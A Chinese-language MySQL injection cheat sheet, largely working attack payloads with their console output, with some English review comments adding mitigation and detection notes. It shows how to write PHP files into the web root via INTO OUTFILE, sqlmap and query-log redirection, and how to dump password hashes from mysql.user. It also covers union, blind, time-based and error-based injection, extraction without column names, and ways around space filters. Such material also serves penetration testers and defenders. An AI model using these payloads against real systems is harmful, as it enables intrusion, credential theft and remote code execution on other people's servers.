
MYSQL注入总结

写shell命令总结

sql语句写入shell:

# Writes the quoted string to a file on the database host via INTO OUTFILE.
# NOTE(review): INTO OUTFILE needs the FILE privilege on the connecting
# account and is constrained by secure_file_priv (NULL disables it entirely,
# a directory value confines writes to that directory); the mysqld OS user
# must also be able to write the target path — confirm all three on the server.
# Mitigation: do not grant FILE to application accounts; point secure_file_priv
# away from any web-served directory.
select '<?php phpinfo(); ?>' into outfile '/var/www/html/info.php';

sqlmap写入shell:

# sqlmap --file-write/--file-dest: copies a local file to a path on the DB host.
# NOTE(review): presumably relies on the same server-side conditions as the
# INTO OUTFILE statement above (FILE privilege, secure_file_priv, a web root
# writable by mysqld) — verify against the sqlmap version in use.
sqlmap -u "http://x.x.x.x/?id=x" --file-write="/Users/guang/Desktop/shell.php" --file-dest="/var/www/html/test/shell.php"

日志文件写入shell:

# Change the log file location: enable the general query log and point it at a
# file under the web root.
# NOTE(review): SET GLOBAL on these variables requires a highly privileged
# account (SUPER / SYSTEM_VARIABLES_ADMIN, depending on version) — confirm for
# the target release; a least-privilege application account should not hold it.
# Detection: alert on any runtime change of general_log_file to a path outside
# the configured data/log directory.
set global general_log = "ON";
set global general_log_file='/var/www/html/info.php';

# 查看当前配置
mysql> SHOW VARIABLES LIKE 'general%';
+------------------+-----------------------------+
| Variable_name | Value |
+------------------+-----------------------------+
| general_log | ON |
| general_log_file | /var/www/html/info.php |
+------------------+-----------------------------+

# Write the payload into the log: the SELECT merely returns its string
# argument, but with the general log enabled the statement text is presumably
# recorded in the log file configured above — that, not the result set, is
# the write channel.
select '<?php phpinfo();?>';

hash密码获取

MySQL <= 5.6 版本

mysql> select host, user, password from mysql.user;
+-----------+------+-------------------------------------------+
| host | user | password |
+-----------+------+-------------------------------------------+
| localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| ::1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| % | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
+-----------+------+-------------------------------------------+

MySQL >= 5.7 版本

mysql > select host,user,authentication_string from mysql.user;
+-----------+---------------+-------------------------------------------+
| host | user | authentication_string |
+-----------+---------------+-------------------------------------------+
| localhost | root | *8232A1298A49F710DBEE0B330C42EEC825D4190A |
| localhost | mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| localhost | mysql.sys | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
+-----------+---------------+-------------------------------------------+

mysql常用技巧

order by:用于判断字段数量

mysql> select id,username from user order by 1;
+----+-----------+
| id | username |
+----+-----------+
| 1 | testdemo |
| 2 | testdemo2 |
| 3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)
mysql> select id,username from user order by 3;
ERROR 1054 (42S22): Unknown column '3' in 'order clause'

limit:用于限制查询结果行数

mysql> select id,username from user limit 0,1;
+----+----------+
| id | username |
+----+----------+
| 1 | testdemo |
+----+----------+
1 row in set (0.00 sec)

不使用逗号的limit

mysql> select id,username from user limit 1 offset 0;
+----+----------+
| id | username |
+----+----------+
| 1 | testdemo |
+----+----------+
1 row in set (0.00 sec)

mysql中的注释

#:单行注释

mysql> select id,username from user;#select user();
+----+-----------+
| id | username |
+----+-----------+
| 1 | testdemo |
| 2 | testdemo2 |
| 3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

/**/: 单行注释

mysql> select id,username from user;/*select user()*/;
+----+-----------+
| id | username |
+----+-----------+
| 1 | testdemo |
| 2 | testdemo2 |
| 3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

--+(空格):单行注释

mysql> select id,username from user;-- select user();
+----+-----------+
| id | username |
+----+-----------+
| 1 | testdemo |
| 2 | testdemo2 |
| 3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

/*!*/:内联注释

mysql> /*!select*/ id,username from user;
+----+-----------+
| id | username |
+----+-----------+
| 1 | testdemo |
| 2 | testdemo2 |
| 3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

/*!12345*/:内联注释

mysql> /*!12345select*/ id,username from user;
+----+-----------+
| id | username |
+----+-----------+
| 1 | testdemo |
| 2 | testdemo2 |
| 3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

mysql中的比较语句:都支持16进制

in:

mysql> select 1 in (1);
+----------+
| 1 in (1) |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)

like:

mysql> select 1234 like '%23%'; # 模糊匹配
+------------------+
| 1234 like '%23%' |
+------------------+
| 1 |
+------------------+
1 row in set (0.00 sec)

regexp:

mysql> select '123456' regexp '[0-9]+'; # 正则匹配
+--------------------------+
| '123456' regexp '[0-9]+' |
+--------------------------+
| 1 |
+--------------------------+
1 row in set (0.00 sec)

rlike:

mysql> select '123456' rlike '[0-9]+'; # 正则匹配
+-------------------------+
| '123456' rlike '[0-9]+' |
+-------------------------+
| 1 |
+-------------------------+
1 row in set (0.00 sec)

mysql查询语句:

查询数据库名:

mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name |
+--------------------+
| information_schema |
| empirecms |
| met |
| mysql |
| performance_schema |
| test |
+--------------------+
6 rows in set (0.01 sec)

查询库中的表名:

mysql> select table_name from information_schema.tables where table_schema='test';
+------------+
| table_name |
+------------+
| user |
+------------+
1 row in set (0.00 sec)

查询表中的字段名:

mysql> select column_name from information_schema.columns where table_name='user';
+------------------------+
| column_name |
+------------------------+
| Host |
| User |
| Password |
| Select_priv |
| Insert_priv |
| ........... |
+------------------------+
45 rows in set (0.02 sec)

mysql中的条件语句

IF(expr1,expr2,expr3):

如果expr1为TRUE,则返回值为expr2,否则返回值为expr3

mysql> select if(1=1,'yes','no');
+--------------------+
| if(1=1,'yes','no') |
+--------------------+
| yes |
+--------------------+
1 row in set (0.00 sec)

mysql> select if(1=2,'yes','no');
+--------------------+
| if(1=2,'yes','no') |
+--------------------+
| no |
+--------------------+
1 row in set (0.00 sec)

IFNULL(expr1,expr2):

如果expr1不为NULL,则返回值为expr1,否则其返回值为expr2

mysql> select ifnull(1,'testdemo');
+----------------------+
| ifnull(1,'testdemo') |
+----------------------+
| 1 |
+----------------------+
1 row in set (0.00 sec)

mysql> select ifnull(1/0,'testdemo');
+------------------------+
| ifnull(1/0,'testdemo') |
+------------------------+
| testdemo |
+------------------------+
1 row in set (0.00 sec)

case when expr1 then expr2 else expr3 end:

如果expr1为TRUE,则返回值为expr2,否则返回值为expr3

mysql> select case when ascii(substr(database(),1,1))>1 then 1 else 2 end;
+-------------------------------------------------------------+
| case when ascii(substr(database(),1,1))>1 then 1 else 2 end |
+-------------------------------------------------------------+
| 1 |
+-------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select case when ascii(substr(database(),1,1))>128 then 1 else 2 end;
+---------------------------------------------------------------+
| case when ascii(substr(database(),1,1))>128 then 1 else 2 end |
+---------------------------------------------------------------+
| 2 |
+---------------------------------------------------------------+
1 row in set (0.00 sec)

mysql中的联合注入union

union select:

mysql> select * from user union select 1,2,3;
+----+-----------+----------------------------------+
| id | username | password |
+----+-----------+----------------------------------+
| 1 | testdemo | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
| 1 | 2 | 3 |
+----+-----------+----------------------------------+
4 rows in set (0.00 sec)

union all select:

mysql> select * from user union all select 1,2,3;
+----+-----------+----------------------------------+
| id | username | password |
+----+-----------+----------------------------------+
| 1 | testdemo | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
| 1 | 2 | 3 |
+----+-----------+----------------------------------+
4 rows in set (0.00 sec)

盲注

通过返回结果来判断字符ascii码,最终能获取database()的结果

mysql> select username,password from user where id=1 and ascii(substr((select database()),1,1))>65;
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| testdemo | e10adc3949ba59abbe56e057f20f883e |
+----------+----------------------------------+
1 row in set (0.00 sec)

mysql> select username,password from user where id=1 and ascii(substr((select database()),1,1))>128;
Empty set (0.00 sec)

延迟注入

通过返回的结果的时间来判断字符ascii码,最终能获取database()的结果

IF():

mysql> select username from user where id=1 and if(ascii(substr((select database()),1,1))>1,1,sleep(1));
+----------+
| username |
+----------+
| testdemo |
+----------+
1 row in set (0.00 sec)

mysql> select username from user where id=1 and if(ascii(substr((select database()),1,1))>128,1,sleep(1));
Empty set (1.00 sec)

IFNULL():

mysql> select username from user where id=1 and ifnull(1/(ascii(substr((select database()),1,1))>1),sleep(1));
+----------+
| username |
+----------+
| testdemo |
+----------+
1 row in set (0.00 sec)

mysql> select username from user where id=1 and ifnull(1/(ascii(substr((select database()),1,1))>128),sleep(1));
Empty set (1.00 sec)

case when expr1 then expr2 else expr3 end:

mysql> select username from user where id=1 and (select case when ascii(substr((select database()),1,1))>1 then 1 else sleep(1) end);
+----------+
| username |
+----------+
| testdemo |
+----------+
1 row in set (0.00 sec)

mysql> select username from user where id=1 and (select case when ascii(substr((select database()),1,1))>128 then 1 else sleep(1) end);
Empty set (1.00 sec)

报错注入

updatexml():

mysql> select username from user where 1=1 and updatexml(1,concat(0x7e,(select database())),1);
ERROR 1105 (HY000): XPATH syntax error: '~test'

extractvalue():

mysql> select username from user where 1=1 and extractvalue(1,concat(0x7e,(select database())));
ERROR 1105 (HY000): XPATH syntax error: '~test'

floor():

mysql> select username from user where 1=1 and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from mysql.user group by x)a);
ERROR 1062 (23000): Duplicate entry 'test1' for key 'group_key'

name_const():比较鸡肋

mysql> select username from user where 1=1 and (select * from (select name_const(version(),1),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.5.53'

exp():对于版本限制比较大

mysql> select exp(~(select * from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

在不知道列名的情况下注入

正常查询。字段名为id,username,password

mysql> select * from user;
+----+-----------+----------------------------------+
| id | username | password |
+----+-----------+----------------------------------+
| 1 | testdemo | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+----+-----------+----------------------------------+
3 rows in set (0.00 sec)

联合查询,字段名变为1,2,3

mysql> select 1,2,3 union select * from user;
+---+-----------+----------------------------------+
| 1 | 2 | 3 |
+---+-----------+----------------------------------+
| 1 | 2 | 3 |
| 1 | testdemo | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
4 rows in set (0.00 sec)

畸形查询:

姿势1:

mysql> select `1`,`2`,`3` from (select 1,2,3 union select * from user)x limit 1,3;
+---+-----------+----------------------------------+
| 1 | 2 | 3 |
+---+-----------+----------------------------------+
| 1 | testdemo | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
3 rows in set (0.00 sec)

姿势2:

10
mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from user;
+---+-----------+----------------------------------+
| 1 | 2 | 3 |
+---+-----------+----------------------------------+
| 1 | 2 | 3 |
| 1 | testdemo | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
4 rows in set (0.00 sec)

姿势3:

mysql> select `1`,`2`,`3` from (select * from (select 1)a,(select 2)b,(select 3)c union select * from user)x limit 1,3;
+---+-----------+----------------------------------+
| 1 | 2 | 3 |
+---+-----------+----------------------------------+
| 1 | testdemo | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
3 rows in set (0.00 sec)

姿势4:

mysql> select * from (select * from (select 1)a join (select 2)b join (select 3)c union select * from user)x limit 3 offset 1;
+---+-----------+----------------------------------+
| 1 | 2 | 3 |
+---+-----------+----------------------------------+
| 1 | testdemo | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
3 rows in set (0.00 sec)

空格复仇技巧

# Alternative spellings of the same simple queries in which an ordinary space
# character is replaced by parentheses, backticks, comments, or a newline.
# NOTE(review): the %0A forms are URL-encoded and only become a newline after
# the web layer decodes them — they must be judged at the decoding point, not
# on the raw request.
# Detection/mitigation: a filter keyed on the literal space character matches
# none of these substitutions; inspect the decoded, comment-stripped statement
# instead, and prefer parameterised queries, which make the spacing irrelevant.
select(username)from(user);
select`username`from`user`;
/*!select*/username/**/from/*!12345user*/;
select{x username}from{x user};
select version/**/();
select version%0A();
select `version`();
select user from mysql/**/./**/user;
select user from `mysql`.`user`;
select user from mysql%0A.%0Auser;